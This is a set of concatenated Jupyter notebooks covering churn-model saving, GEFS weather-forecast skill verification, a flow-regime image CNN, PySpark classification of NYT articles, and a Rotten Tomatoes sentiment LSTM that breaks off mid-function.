def create_download_link_csv(df, title = "Download CSV file", filename = "data.csv"):
# generate in-memory CSV, then base64-encode it
csv = df.to_csv(index=False)
b64 = base64.b64encode(csv.encode())
payload = b64.decode()
html = '<a download="{filename}" href="data:text/csv;base64,{payload}" target="_blank">{title}</a>'
html = html.format(payload=payload,title=title,filename=filename)
return HTML(html)
# -
# Write the test data a .csv so that we can later use it for batch scoring
create_download_link_csv(X_test,"Download my data","churn_risk_model_batch_score.csv")
# Write the test data to a .csv so that we can later use it for evaluation
create_download_link_csv(X_test,"Download my data","model_eval.csv")
# #### Save and restore the model using the joblib package
# Save the pipeline with joblib
# !pip install joblib
import joblib
filename = 'churnrisk_model.sav'
joblib.dump(pipeline, filename)
# ! ls -lrt
# Use joblib to restore the model and score it with the test data
filename = 'churnrisk_model.sav'
loaded_model = joblib.load(filename)
result = loaded_model.score(X_test, y_test)
print(result)
# #### Save and restore the model using the pickle package
# Save the pipeline with pickle
import pickle
filename = 'churnrisk_model.pkl'
pickle.dump(model, open(filename, 'wb'))
# !ls -lrt
# Use pickle to restore the model and score it with the test data
filename = 'churnrisk_model.pkl'
loaded_model = pickle.load(open(filename, 'rb'))
result = loaded_model.score(X_test, y_test)
print(result)
# #### Use the project_lib package to save the model to the project data assets where it can be downloaded
from project_lib import Project
# project id from project url
# the id can be taken from the project url shown in the browser,
# For example, the project id is 28f40464-f07e-43c4-94a0-f6100744bd3d in this notebook URL
# https://dataplatform.cloud.ibm.com/analytics/notebooks/v2/3fed0ab0-2abe-4ff1-8aee-26481557e7c3?projectid=28f40464-f07e-43c4-94a0-f6100744bd3d&context=cpdaas
project_id = 'YOUR PROJECT ID'
# Get the value of access token created earlier in the Project Settings
access_token = 'YOUR ACCESS TOKEN'
project = Project(None, project_id, access_token)
# prin project details of interest
pc = project.project_context
print('Project Name: {0}'.format(project.get_name()))
print('Project Description: {0}'.format(project.get_description()))
print('Project Bucket Name: {0}'.format(project.get_project_bucket_name()))
print('Project Assets (Connections): {0}'.format(project.get_assets(asset_type='connection')))
# Save the models to object storage
project.save_data(data=pickle.dumps(pipeline),file_name='churn_risk.pkl',overwrite=True)
# **Last updated:** 10/11/2020 - Original Notebook by <NAME>, updated in later versions by <NAME>. Final edits by <NAME> and <NAME> - IBM. Updated for the Virtual TechU Oct 2020 by <NAME>.
|
TradingCustomerChurnClassifier.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# #!conda install intake fsspec intake-xarray intake-thredds -c conda-forge -y
# +
# #!conda install eccodes cfgrib -c conda-forge -y
# +
# #!pip install climetlab --quiet
# -
# linting
# %load_ext nb_black
# %load_ext lab_black
# # Calculate skill for NWP model GEFS for 6-hourly global forecasts
# +
import intake
import fsspec # caching downloads
# specify caching location, where to store files to with their original names
fsspec.config.conf["simplecache"] = {
"cache_storage": "../my_caching_folder",
"same_names": True,
}
import intake_xarray # access files hosted via THREDDS
import climetlab # download ERA5
import xarray as xr
import numpy as np
import climpred # forecast verification
# -
# ## Find the data
# GEFS output can be found on a `THREDDS` server: https://www.ncei.noaa.gov/thredds/catalog/model-gefs-003/202008/20200831/catalog.html
#
# Here, we use `intake-thredds` to access the THREDDS catalog, `intake-xarray` to access the files and cache them with `fsspec`. However, you can also download the files manually, e.g. with `wget`:
#
# - https://intake.readthedocs.io/en/latest/
# - https://intake-xarray.readthedocs.io/en/latest/
# - https://intake-thredds.readthedocs.io/en/latest/
# - https://filesystem-spec.readthedocs.io/en/latest/
# all the metadata about GEFS
cat = intake.open_thredds_cat(
"https://www.ncei.noaa.gov/thredds/catalog/model-gefs-003/202008/20200831/catalog.html"
)
# cat
# Opening without `backend_kwargs` raised `DatasetBuildError`. Need to specify variable by `filter_by_keys` for `grib` files.
#
# DatasetBuildError: multiple values for unique key, try re-open the file with one of:
#
# - filter_by_keys={'typeOfLevel': 'isobaricInhPa'}
# - filter_by_keys={'typeOfLevel': 'surface'}
# - filter_by_keys={'typeOfLevel': 'depthBelowLandLayer'}
# - filter_by_keys={'typeOfLevel': 'heightAboveGround'}
# - filter_by_keys={'typeOfLevel': 'atmosphereSingleLayer'}
# - filter_by_keys={'typeOfLevel': 'atmosphere'}
# - filter_by_keys={'typeOfLevel': 'nominalTop'}
# - filter_by_keys={'typeOfLevel': 'pressureFromGroundLayer'}
# - filter_by_keys={'typeOfLevel': 'meanSea'}
# how to open grib files: https://github.com/ecmwf/cfgrib/issues/170
intake_xarray.NetCDFSource(
"simplecache::https://www.ncei.noaa.gov/thredds/fileServer/model-gefs-003/202008/20200831/gens-a_3_20200831_1800_000_20.grb2",
xarray_kwargs=dict(
engine="cfgrib",
backend_kwargs=dict(
filter_by_keys={"typeOfLevel": "heightAboveGround", "shortName": "2t"}
),
),
).to_dask().coords
# ## Get forecasts
inits_time = "0000" # get forecasts started at 00:00
inits = ["20200829", "20200830", "20200831"] # four initial dates
members = range(5) # 5 members out of 20
leads = np.arange(0, 6 * 4 * 2 + 1, 6) # 6h lead forecasts, 9 leads upto 48h
for init in inits:
for lead in leads:
for member in members:
try:
url = f'https://www.ncei.noaa.gov/thredds/fileServer/model-gefs-003/202008/{init}/gens-a_3_{init}_{inits_time}_{str(lead).zfill(3)}_{str(member).zfill(2)}.grb2'
#print(f'download init = {init}, lead = {lead}, member = {member}')
intake_xarray.NetCDFSource(f'simplecache::{url}',
xarray_kwargs=dict(engine='cfgrib', backend_kwargs=dict(filter_by_keys={'typeOfLevel': 'heightAboveGround', 'shortName':'2t'})),
).to_dask()
except Exception as e:
print('failed', type(e).__name__, e)
init = xr.concat(
[xr.concat(
[xr.open_mfdataset(f'../my_caching_folder/gens-a_3_{init}_{inits_time}_{str(lead).zfill(3)}_*.grb2',
concat_dim='member', combine='nested',
engine='cfgrib', backend_kwargs=dict(filter_by_keys={'typeOfLevel': 'heightAboveGround', 'shortName': '2t'}))
for lead in leads],
dim='step') for init in inits],
dim='time')
# save time when reproducing
init = init.compute()
init.to_netcdf('tmp_GEFS_a.nc')
init = xr.open_dataset("tmp_GEFS_a.nc")
# rename to climpred dims
init = init.rename({'step':'lead','number':'member','time':'init'})
# set climpred lead units
init["lead"] = np.arange(0, 6 * init.lead.size, 6)
init.lead.attrs["units"] = "hours"
# ## Get observations
#
# `climetlab` wraps `cdsapi` to download from the Copernicus Climate Data Store (CDS):
#
# - https://cds.climate.copernicus.eu/cdsapp#!/home
# - https://climetlab.readthedocs.io/en/latest/
# - https://github.com/ecmwf/cdsapi/
obs = climetlab.load_source(
"cds",
"reanalysis-era5-single-levels",
product_type="reanalysis",
time=["00:00", "06:00", "12:00", "18:00"],
grid=[1.0, 1.0],
param="2t",
date=[
"2020-08-29",
"2020-08-30",
"2020-08-31",
"2020-09-01",
"2020-09-02",
"2020-09-03",
],
).to_xarray()
# +
# climetlab or cds enable logging.INFO
import logging
logger = logging.getLogger()
logger.setLevel(logging.ERROR)
# -
# observations should only have time and no coordinates about number/member, step/lead or valid_time
obs = obs.drop(["number", "step", "surface", "valid_time"])
# ## Forecast skill verification with `climpred.HindcastEnsemble`
alignment = "same_inits"
hindcast = climpred.HindcastEnsemble(init.drop("valid_time")).add_observations(obs)
# +
# still experimental, help appreciated https://github.com/pangeo-data/climpred/issues/605
# with climpred.set_options(seasonality='month'):
# hindcast = hindcast.remove_bias(alignment=alignment, cross_validate=False, how='mean')
# +
skill = hindcast.isel(lead=range(1, 9)).verify(
metric="crps", comparison="m2o", alignment=alignment, dim=["init", "member"]
)
skill.t2m.plot(col="lead", col_wrap=4, robust=True)
# -
# zooming into north america
skill.sel(longitude=slice(200, 320), latitude=slice(70, 15)).t2m.plot(
col="lead", col_wrap=4, robust=True, aspect=2.5
)
|
docs/source/examples/NWP/NWP_GEFS_6h_forecasts.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.8.10 64-bit (''.venv'': pipenv)'
# language: python
# name: python3
# ---
# # ML model to recognize two-phase flows regimes
# ## Import modules
# +
# Import modules
# ------------------------------------------------------------------------------ #
# Built-in modules
import os
# os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import glob
import random
# Third-party modules
import numpy as np
import pandas as pd
import tensorflow as tf
import matplotlib.pyplot as plt
# ------------------------------------------------------------------------------ #
# -
# ## Image data generator
# +
# Input data
# ------------------------------------------------------------------------------ #
n_img = 1000 # number of images to take from each run
# Labels
# 1 - Plug Flow; 2 - Transition Flow; 3 - Slug Flow
# Initialize lists
training_imgs = []
training_labels = []
# ------------------------------------------------------------------------------ #
# Data from Slug-Frequency campaign
# ------------------------------------------------------------------------------ #
IJMF_dir = '/media/psassi/URV/Paolo/URV/data/FastCam/3_Freq/Velocity/2P'
IJMF_regimes = [2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3]
#
dir_contents = os.listdir(IJMF_dir)
dir_contents.sort()
two_phase_runs = []
for run in dir_contents:
if '2P' in run:
two_phase_runs.append(os.path.join(IJMF_dir,run))
two_phase_runs.sort()
#
for i, run in enumerate(two_phase_runs):
imgs_path = os.path.join(run, 'PPS_images', "*png")
files = glob.glob(imgs_path)
training_imgs.extend(random.sample(files,n_img))
training_labels.extend([str(IJMF_regimes[i])]*n_img)
# ------------------------------------------------------------------------------ #
# -
# ------------------------------------------------------------------------------ #
# Data from ECMF campaign
# ------------------------------------------------------------------------------ #
FTaC_dir = '/media/psassi/URV/Paolo/URV/data/FastCam/2_FTaC/Backlight/2P'
FTaC_regimes = [1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 2, 2, 2, 2, 3, 3, 2, 3, 3]
#
dir_contents = os.listdir(FTaC_dir)
dir_contents.sort()
FTaC_runs = []
for run in dir_contents:
if '2P' in run:
FTaC_runs.append(os.path.join(FTaC_dir,run))
FTaC_runs.sort()
#
for i, run in enumerate(FTaC_runs):
imgs_path = os.path.join(run, 'PNG_images', "*png")
files = glob.glob(imgs_path)
training_imgs.extend(random.sample(files,n_img))
training_labels.extend([str(FTaC_regimes[i])]*n_img)
# ------------------------------------------------------------------------------ #
# +
from sklearn.model_selection import train_test_split
from tensorflow.keras.preprocessing.image import ImageDataGenerator
# Make pandas Data Frame
two_phase_pd = pd.DataFrame(
zip(training_imgs,training_labels), columns=['Files', 'Labels']
)
# Divide training and testing data frames
train_df, test_df = train_test_split(two_phase_pd, test_size=0.2)
# Make train generator
train_generator = ImageDataGenerator().flow_from_dataframe(
train_df,
x_col='Files',
y_col='Labels',
target_size=(512, 256),
color_mode='grayscale',
class_mode='sparse',
batch_size=64,
)
# Make test generator
test_generator = ImageDataGenerator().flow_from_dataframe(
test_df,
x_col='Files',
y_col='Labels',
target_size=(512, 256),
color_mode='grayscale',
class_mode='sparse',
batch_size=64,
)
# -
# ## Build the model
# +
model = tf.keras.models.Sequential([
# Note the input shape is the desired size of the image 512x256 with 1 byte color
tf.keras.layers.Conv2D(16, (3,3), activation='relu', input_shape=(512, 256, 1)),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(32, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# Flatten the results to feed into a DNN
tf.keras.layers.Flatten(),
# 512 neuron hidden layer
tf.keras.layers.Dense(512, activation='relu'),
tf.keras.layers.Dense(3, activation='softmax')
])
model.summary()
# -
model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=1e-3),
loss='sparse_categorical_crossentropy',
metrics = ['accuracy'])
history = model.fit(
train_generator,
epochs=10,
validation_data=test_generator,
verbose=2
)
# +
#-----------------------------------------------------------
# Retrieve a list of list results on training and test data
# sets for each training epoch
#-----------------------------------------------------------
acc = history.history[ 'accuracy' ]
val_acc = history.history[ 'val_accuracy' ]
loss = history.history[ 'loss' ]
val_loss = history.history['val_loss' ]
epochs = range(len(acc)) # Get number of epochs
#------------------------------------------------
# Plot training and validation accuracy per epoch
#------------------------------------------------
plt.plot ( epochs, acc )
plt.plot ( epochs, val_acc )
plt.title ('Training and validation accuracy')
plt.figure()
#------------------------------------------------
# Plot training and validation loss per epoch
#------------------------------------------------
plt.plot ( epochs, loss )
plt.plot ( epochs, val_loss )
plt.title ('Training and validation loss' )
# -
model.save('./src/models/regime_identifier.h5')
|
test.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # TEXT CLASSIFICATION USING PYSPARK AND MLLIB
#
# ### Create DATA FRAME in PYSPARK
from pyspark import SparkContext
sc = SparkContext.getOrCreate()
# +
import os
#path = os.chdir('./')
from pyspark.sql import SQLContext
from pyspark import SparkContext
sc =SparkContext.getOrCreate()
sqlContext = SQLContext(sc)
# -
from pyspark.ml import Pipeline, PipelineModel
from pyspark.ml.classification import LogisticRegression
from pyspark.ml.evaluation import BinaryClassificationEvaluator
from pyspark.ml.feature import HashingTF, StopWordsRemover, IDF, Tokenizer
from pyspark.ml.tuning import ParamGridBuilder,CrossValidator
from pyspark.mllib.linalg import Vector
# ### Read Downloaded Data Files ; Create Learning DataSet
dirpath = 'data/NYT-articles/*'
NYTRawData = sc.wholeTextFiles(dirpath)
#print("The number of documents read in is " + NYTRawData.count() + ".")
NYTRawData.count()
# ### Create UNKNOWN Dataset
dirpathUN = 'data/Validation set/*'
NYTRawDataUNKNOWN = sc.wholeTextFiles(dirpathUN)
#print("The number of documents read in is " + NYTRawData.count() + ".")
NYTRawDataUNKNOWN.count()
# ### Display Sample Data from Learning Dataset
NYTRawData.takeSample(False,1, seed = 231279)
# ### Display Sample Data from UNKNOWN Dataset
NYTRawDataUNKNOWN.takeSample(False,1, seed = 231279)
filepath = NYTRawData.map(lambda x:x[0]).collect()
# #### Filter RDD to Capture Text
text = NYTRawData.map(lambda x:x[1]).collect()
textUN = NYTRawDataUNKNOWN.map(lambda x:x[1]).collect()
# #### Convert to DataFrame
# ##### Learning Dataframe = "df"
# ##### Unknown Dataframe =" dfUN"
# +
from pyspark.sql.types import Row
#here you are going to create a function
def f(x):
d = {}
for i in range(len(x)):
d[str(i)] = x[i]
return d
#Now populate that
df = NYTRawData.map(lambda x: Row(**f(x))).toDF()#.withColumn("Label",lit("Politics"))
dfUN = NYTRawDataUNKNOWN.map(lambda x: Row(**f(x))).toDF()
# -
df.columns
dfUN.columns
df.show(4)
# #### Prepare Learning Dataset for Modeling using Classification Models
# ###### Split Columns to get Category of each Article
from pyspark.sql.functions import split
split_col = split(df['0'], '/')
df = df.withColumn('NAME6', split_col.getItem(6))
df = df.withColumn('NAME7', split_col.getItem(7))
df.show()
df.printSchema()
drop_list = ['0', 'NAME6']#, 'DayOfWeek', 'PdDistrict', 'Resolution', 'Address', 'X', 'Y']
df = df.select([column for column in df.columns if column not in drop_list])
df.show(5)
df.printSchema()
# +
from pyspark.sql.functions import col
df = df.select(col("1").alias("Article"), col("NAME7").alias("Category"))
df.show()
# -
df.show(500)
# ##### Learning Data Set
#
# ##### (Collection of approx 589 articles in 4 categories from NYT)
from pyspark.sql.functions import col
df.groupBy("Category") \
.count() \
.orderBy(col("count").desc()) \
.show()
# #### Prepare UNKNOWN DataSet for Testing using CLASSIFICATION MODELS
# +
split_col = split(dfUN['0'], '/')
dfUN = dfUN.withColumn('NAME6', split_col.getItem(6))
dfUN = dfUN.withColumn('NAME7', split_col.getItem(7))
dfUN.printSchema()
drop_list = ['0', 'NAME6']#, 'DayOfWeek', 'PdDistrict', 'Resolution', 'Address', 'X', 'Y']
dfUN = dfUN.select([column for column in dfUN.columns if column not in drop_list])
#dfUN.show(5)
dfUN = dfUN.select(col("1").alias("Article"), col("NAME7").alias("Category"))
#dfUN.show()
from pyspark.sql.functions import col
dfUN.groupBy("Category") \
.count() \
.orderBy(col("count").desc()) \
.show()
# -
# + active=""
#
# -
# ### DIvide Learning Data Set into Training and Test
# set seed for reproducibility
(trainingData, testData) = df.randomSplit([0.8, 0.2], seed = 231279)
print("Training Dataset Count: " + str(trainingData.count()))
print("Test Dataset Count: " + str(testData.count()))
trainingData.show()
testData.show()
# #### DISPLAY UNknown DF
dfUN.show()
# ## Classification Using Logistic Regression
# **LogisticRegression** is a method used to predict a binary response. The current implementation of logistic regression in spark.ml only supports binary classes. Support for multiclass regression will be added in the future.
# ### Train the Learning Dataset (TRAIN And TEst)
# ### Build Pipeline using TF IDF
#
# In machine learning, it is common to run a sequence of algorithms to process and learn from data. Spark ML represents such a workflow as a Pipeline, which consists of a sequence of PipelineStages (Transformers and Estimators) to be run in a specific order. The pipeline we are using in this example consists of four stages: Tokenizer, StopWordsRemover, HashingTF, Inverse Document Frequency (IDF) and LogisticRegression.
#
# **Tokenizer** splits the raw text documents into words, adding a new column with words into the dataset.
#
# **StopWordsRemover** takes as input a sequence of strings and drops all the stop words from the input sequences. Stop words are words which should be excluded from the input, typically because the words appear frequently and don’t carry as much meaning. A list of stop words by default. Optionally you can provide a list of stopwords. We will just use the defualt list of stopwords.
#
# **HashingTF** takes sets of terms and converts those sets into fixed-length feature vectors.
#
# **Inverse Document Frequency (IDF)** is a numerical measure of how much information a term provides. If a term appears very often across the corpus, it means it doesn’t carry special information about a particular document. IDF down-weights terms which appear frequently in a corpus.
#
#
#
# ###### Our model will make predictions and score on the test set; we then look at the top 10 predictions from the highest probability.
from pyspark.ml.feature import RegexTokenizer
regexTokenizer = RegexTokenizer(inputCol="Article", outputCol="words", pattern="\\W")
remover = StopWordsRemover(inputCol="words", outputCol="filtered")
add_stopwords = ["http","https","amp","rt","t","c","the"]
stopwordsRemover = StopWordsRemover(inputCol="words", outputCol="filtered").setStopWords(add_stopwords)
hashingTF = HashingTF(inputCol="filtered", outputCol="rawFeatures", numFeatures=10000)
idf = IDF(inputCol="rawFeatures", outputCol="features", minDocFreq=5)
lr = LogisticRegression(maxIter=20, regParam=0.3, elasticNetParam=0)
from pyspark.ml.feature import OneHotEncoder, StringIndexer, VectorAssembler
label_stringIdx = StringIndexer(inputCol = "Category", outputCol = "label")
# ### Define Learning Model
pipeline = Pipeline(stages=[regexTokenizer, remover, hashingTF, idf, label_stringIdx, lr])
model = pipeline.fit(trainingData)
# ### Train the Model using Logistic Regression
lrdata = model.transform(trainingData).select("words","features","label","probability","prediction").show()
# ### Perform Prediction on TEST Data
predictions = model.transform(testData)
predictions.filter(predictions['prediction'] == 1) \
.select("Category","features","probability","label","prediction") \
.orderBy("probability", ascending=False) \
.show(n = 10, truncate = 30)
# ## Accuracy on Test data using Logistic Regression
# #### Keep in mind that the model has not seen the documents in the test data set.
from pyspark.ml.evaluation import MulticlassClassificationEvaluator
evaluator = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluator.evaluate(predictions)
# ## Accuracy of UNKNOWN Data using Logistic Regression
# #### Keep in mind that the model has not seen the documents in the Unknown data set.
predictions = model.transform(dfUN)
predictions.filter(predictions['prediction'] == 1) \
.select("Category","features","probability","label","prediction") \
.orderBy("probability", ascending=False) \
.show(n = 10, truncate = 30)
from pyspark.ml.evaluation import MulticlassClassificationEvaluator
evaluator = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluator.evaluate(predictions)
# ## CLASSIFICATION USING "NAIVE BAYES"
# ### RANDOM SPLIT DATA AGAIN
# ### DEFINE PIPELINE
# ### TRAIN MODEL
# +
from pyspark.ml.classification import NaiveBayes
(trainingData2, testData2) = df.randomSplit([0.8, 0.2], seed = 231279)
nb = NaiveBayes(smoothing=1)
pipelinenb = Pipeline(stages=[regexTokenizer, remover, hashingTF, idf, label_stringIdx, nb])
model = pipelinenb.fit(trainingData2)
# -
nbdata = model.transform(trainingData).select("words","features","label","probability","prediction").show()
# ### Perform Prediction of TEst Data using Model Trained on "Naive Bayes"
predictions = model.transform(testData2)
predictions.filter(predictions['prediction'] == 0) \
.select("Category","features","probability","label","prediction") \
.orderBy("probability", ascending=False) \
.show(n = 10, truncate = 30)
# ## Accuracy of Test data Using "Naive Bayes"
# #### Keep in mind that the model has not seen the documents in the test data set.
evaluatornb = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluatornb.evaluate(predictions)
# ## Accuracy of UNKNOWN data Using "Naive Bayes"
# #### Keep in mind that the model has not seen the documents in the Unknown data set.
predictions = model.transform(dfUN)
predictions.filter(predictions['prediction'] == 0) \
.select("Category","features","probability","label","prediction") \
.orderBy("probability", ascending=False) \
.show(n = 10, truncate = 30)
evaluatornb = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluatornb.evaluate(predictions)
# ## Calculate ACCURACY using Cross Validation on Logistic Regression
# Spark MLlib provides for cross-validation for hyperparameter tuning. Cross-validation attempts to fit the underlying estimator with user-specified combinations of parameters, cross-evaluate the fitted models, and output the best one.
# +
from pyspark.ml.tuning import ParamGridBuilder, CrossValidator
lr = LogisticRegression(maxIter=20, regParam=0.3, elasticNetParam=0)
#from pyspark.ml.tuning import ParamGridBuilder, CrossValidator
# Create ParamGrid for Cross Validation
paramGrid = (ParamGridBuilder()
.addGrid(lr.regParam, [0.1, 0.3, 0.5]) # regularization parameter
.addGrid(lr.elasticNetParam, [0.0, 0.1, 0.2]) # Elastic Net Parameter (Ridge = 0)
# .addGrid(model.maxIter, [10, 20, 50]) #Number of iterations
# .addGrid(idf.numFeatures, [10, 100, 1000]) # Number of features
.build())
# Create 5-fold CrossValidator
cv = CrossValidator(estimator=lr, \
estimatorParamMaps=paramGrid, \
evaluator=evaluator, \
numFolds=5)
pipelineCVLR = Pipeline(stages=[regexTokenizer, remover, hashingTF, idf, label_stringIdx,cv])
cvModel = pipelineCVLR.fit(trainingData)
predictions = cvModel.transform(testData)
# Evaluate best model
evaluator = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluator.evaluate(predictions)
# -
# ## Accuracy of UNKNOWN Data using CV with Logistic Regression
#
predictions = cvModel.transform(dfUN)
# Evaluate best model
evaluator = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluator.evaluate(predictions)
# ## CLASSIFICATION USING "RANDOM FOREST"
# +
from pyspark.ml.classification import RandomForestClassifier
rf = RandomForestClassifier(labelCol="label", \
featuresCol="features", \
numTrees = 100, \
maxDepth = 4, \
maxBins = 32)
pipelineRF = Pipeline(stages=[regexTokenizer, remover, hashingTF, idf, label_stringIdx, rf])
# Train model with Training Data
rfModel = pipelineRF.fit(trainingData)
predictions = rfModel.transform(testData)
predictions.filter(predictions['prediction'] == 0) \
.select("Category","features","probability","label","prediction") \
.orderBy("probability", ascending=False) \
.show(n = 10, truncate = 30)
# -
# ## Accuracy of Test Data using "Random Forest"
#
evaluator = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluator.evaluate(predictions)
# ## Accuracy of UNKNOWN Data using "Random Forest"
#
predictions = rfModel.transform(dfUN)
predictions.filter(predictions['prediction'] == 0) \
.select("Category","features","probability","label","prediction") \
.orderBy("probability", ascending=False) \
.show(n = 10, truncate = 30)
evaluator = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluator.evaluate(predictions)
# ## ASSESSMENT:
#
#
# #### Accuracy of Unknown Dataset on Various Models:
# ##### Logistic Regression: $0.918297808424174$
# ##### Naive Bayes : $0.9387861118473364$
# ##### Cross Validation Using Logistic Regression : $0.9796340896607091$
# ##### Random Forest : $0.8011736273456751$
#
# #### Clearly the Cross Validation yeilds highest accuracy.
# #### Random forest is not a good choice for high-dimensional sparse data.
#
# ### Conclusion: Logistic Regression Using Cross Validation is the best model in our analysis
#
#
|
NYT-article-classification/more data groups/Text Classification Using PYSPARK.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
# + [markdown] _uuid="51c9a7de75c84275c65ca97e23d4a911fc38e246"
# The dataset is comprised of tab-separated files with phrases from the Rotten Tomatoes dataset. The train/test split has been preserved for the purposes of benchmarking, but the sentences have been shuffled from their original order. Each Sentence has been parsed into many phrases by the Stanford parser. Each phrase has a PhraseId. Each sentence has a SentenceId. Phrases that are repeated (such as short/common words) are only included once in the data.
#
# train.tsv contains the phrases and their associated sentiment labels.
# test.tsv contains just phrases.
#
#
# The sentiment labels are:
# 0 - negative
# 1 - somewhat negative
# 2 - neutral
# 3 - somewhat positive
# 4 - positive
# + _uuid="243e4f9b40ab8a69e682a13d0adee4bfaa4acb6c"
import numpy as np
import pandas as pd
from sklearn.preprocessing import OneHotEncoder
import textblob
# + _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19" _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5"
print("Loading data...")
train = pd.read_csv("../input/movie-review-sentiment-analysis-kernels-only/train.tsv", sep="\t")
print("Train shape:", train.shape)
test = pd.read_csv("../input/movie-review-sentiment-analysis-kernels-only/test.tsv", sep="\t")
print("Test shape:", test.shape)
# + _uuid="129bb2635ee6f2c18ff47dde3df2c268324b541a"
train.head()
# + _uuid="e2eeea8d70a649b106c651734af609dccac869ba"
enc = OneHotEncoder(sparse=False)
enc.fit(train["Sentiment"].values.reshape(-1, 1))
print("Number of classes:", enc.n_values_[0])
print("Class distribution:\n{}".format(train["Sentiment"].value_counts()/train.shape[0]))
# + _uuid="06791fd967e6bfa9130f86a6317dd3b22f640a61"
train["Sentiment"].value_counts().plot.bar()
# + _uuid="04bea1b921fb53f77ee8b069d864d2c103fec0ff"
from sklearn.feature_extraction.text import CountVectorizer
train_cv = CountVectorizer()
train_cv.fit(train["Phrase"])
test_cv = CountVectorizer()
test_cv.fit(test["Phrase"])
print("Train Set Vocabulary Size:", len(train_cv.vocabulary_))
print("Test Set Vocabulary Size:", len(test_cv.vocabulary_))
print("Number of Words that occur in both:", len(set(train_cv.vocabulary_.keys()).intersection(set(test_cv.vocabulary_.keys()))))
# + [markdown] _uuid="2d0cefa184547a5e02f5f389216e1a496f90e982"
# ** Add Numerical Feature**
# + _uuid="2b4043b8831b8a42bd946f762375a3a97516dfc2"
def add_num_feature_to_df(df):
df["phrase_count"] = df.groupby("SentenceId")["Phrase"].transform("count")
df["word_count"] = df["Phrase"].apply(lambda x: len(x.split()))
df["has_upper"] = df["Phrase"].apply(lambda x: x.lower() != x)
df["sentence_end"] = df["Phrase"].apply(lambda x: x.endswith("."))
df["after_comma"] = df["Phrase"].apply(lambda x: x.startswith(","))
df["sentence_start"] = df["Phrase"].apply(lambda x: "A" <= x[0] <= "Z")
df["Phrase"] = df["Phrase"].apply(lambda x: x.lower())
return df
train = add_num_feature_to_df(train)
test = add_num_feature_to_df(test)
dense_features = ["phrase_count", "word_count", "has_upper", "after_comma", "sentence_start", "sentence_end"]
train.groupby("Sentiment")[dense_features].mean()
# + _uuid="ea42c5a316e953cf6740f2798bd3e9b78d4447b9"
train.head()
# + [markdown] _uuid="572a4bda2d8b1cd035f9c6fffa403e7f1b0fbbe4"
# **Transfer Learning Using GLOVE Embeddings**
# + _uuid="3e18956c6b5c5c88e7097c41138a2afb3f4bc1e1"
EMBEDDING_FILE = "../input/glove-global-vectors-for-word-representation/glove.6B.100d.txt"
EMBEDDING_DIM = 100
all_words = set(train_cv.vocabulary_.keys()).union(set(test_cv.vocabulary_.keys()))
def get_embedding():
embeddings_index = {}
emp_f = open(EMBEDDING_FILE)
for line in emp_f:
values = line.split()
word = values[0]
if len(values) == EMBEDDING_DIM + 1 and word in all_words:
coefs = np.asarray(values[1:], dtype="float32")
embeddings_index[word] = coefs
emp_f.close()
return embeddings_index
embeddings_index = get_embedding()
print("Number of words that don't exist in GLOVE:", len(all_words - set(embeddings_index)))
# + [markdown] _uuid="2f93b76d710ea94ed48627babc49bc5261647789"
# **Prepare the sequences for LSTM**
# + _uuid="5d2f6c292c46b367b0ae7f98f8a1fbafc163a0e0"
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
MAX_SEQUENCE_LENGTH = 70
tokenizer = Tokenizer()
tokenizer.fit_on_texts(np.append(train["Phrase"].values, test["Phrase"].values))
word_index = tokenizer.word_index
nb_words = len(word_index) + 1
embedding_matrix = np.random.rand(nb_words, EMBEDDING_DIM + 2)
for word, i in word_index.items():
embedding_vector = embeddings_index.get(word)
sent = textblob.TextBlob(word).sentiment
if embedding_vector is not None:
embedding_matrix[i] = np.append(embedding_vector, [sent.polarity, sent.subjectivity])
else:
embedding_matrix[i, -2:] = [sent.polarity, sent.subjectivity]
# + [markdown] _uuid="d7f3d8de4369b676ffab460533ace55ed08a10ab"
# **Define the Model**
# + _uuid="878174c7d497cf794531afbcc8d81b5f59c803dd"
from keras.layers import *
from keras.models import Model
from keras.callbacks import EarlyStopping, ModelCheckpoint
def build_model():
embedding_layer = Embedding(nb_words,
EMBEDDING_DIM + 2,
weights=[embedding_matrix],
input_length=MAX_SEQUENCE_LENGTH,
trainable=True)
dropout = SpatialDropout1D(0.25)
mask_layer = Masking()
lstm_layer = LSTM(200)
seq_input = Input(shape=(MAX_SEQUENCE_LENGTH,), dtype="int32")
dense_input = Input(shape=(len(dense_features),))
dense_vector = BatchNormalization()(dense_input)
phrase_vector = lstm_layer(mask_layer(dropout(embedding_layer(seq_input))))
feature_vector = concatenate([phrase_vector, dense_vector])
